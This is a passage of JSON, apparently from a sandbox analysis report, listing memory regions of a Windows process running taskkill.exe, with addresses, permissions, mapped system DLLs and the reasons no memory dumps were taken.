"", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2665", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:23.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2666", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:23.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2667", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:23.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2668", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:23.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_2669", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:23.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_2670", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:23.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 9568256, "type": "region", "version": 1 }, "end_va": 9658367, "entry_point": 9591945, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2671", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 9568256, "timestamp": "00:01:23.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2672", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:23.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2673", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:23.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2674", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2675", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2676", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_2677", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2678", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2679", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2680", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:23.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_2681", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:23.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2682", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:23.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2683", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:23.524", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2684", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:23.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2685", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:23.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2686", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:23.525", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2687", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:23.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2688", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:23.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2689", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:23.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_2690", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:23.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 6488063, "entry_point": 0, "filename": null, "id": "region_2691", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:01:23.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2692", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:23.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788628991, "entry_point": 1788416981, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2693", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:23.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788735487, "entry_point": 1788678817, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2694", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:23.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788739584, "type": "region", "version": 1 }, "end_va": 1788809215, "entry_point": 1788744448, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2695", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788739584, "timestamp": "00:01:23.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1788870656, "type": "region", "version": 1 }, "end_va": 1788923903, "entry_point": 1788875232, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2696", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788870656, "timestamp": "00:01:23.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2697", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:23.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2698", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:23.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2699", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:23.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2700", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:23.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2701", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:23.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2702", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:23.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2703", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:23.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2704", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:23.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2705", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:23.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2706", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:23.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2707", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:23.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2708", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:23.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2709", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:23.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2710", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:23.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2711", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:23.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2712", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:23.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2713", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:23.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2714", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:23.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2715", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:23.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2716", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:23.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2717", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:23.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2718", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:23.567", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2719", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:23.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2720", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:23.568", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 8093695, "entry_point": 0, "filename": null, "id": "region_2721", "name": "pagefile_0x0000000000630000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6488064, "timestamp": "00:01:23.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2722", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:23.582", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2723", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:23.583", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2724", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:23.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" 